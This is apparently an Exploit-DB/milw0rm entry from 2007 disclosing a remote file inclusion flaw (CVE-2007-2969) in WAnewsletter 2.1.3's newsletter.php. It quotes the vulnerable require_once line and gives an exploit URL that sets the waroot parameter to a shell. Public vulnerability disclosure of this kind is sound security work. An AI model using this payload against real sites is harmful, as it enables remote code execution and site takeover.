wanewsletter 2.1.3 - Remote File Inclusion

Author: Mogatil
type: webapps
platform: php
port: 
date_added: 2007-05-27 
date_updated: 2016-10-05 
verified: 1 
codes: OSVDB-38812;CVE-2007-2969 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comWAnewsletter-2.1.3.zip

======================= S==A==U==D==I ========================

WAnewsletter-2.1.3 (newsletter.php) RFI Vul

==============================================================

Found By : Mogatil , jjl@hotmail.com

==============================================================

Script Site : http://script.emanual.ru/get?i=1053

==============================================================
File : /newsletter.php


require_once($waroot . 'start.php');

==============================================================

Thanx: cold zero . gawey Al Azary . crazy man . scorbion_22 .
the_muslim_sniper

==============================================================

Exploit :[Path]/newsletter/newsletter.php?waroot=shell

==============================================================

# milw0rm.com [2007-05-28]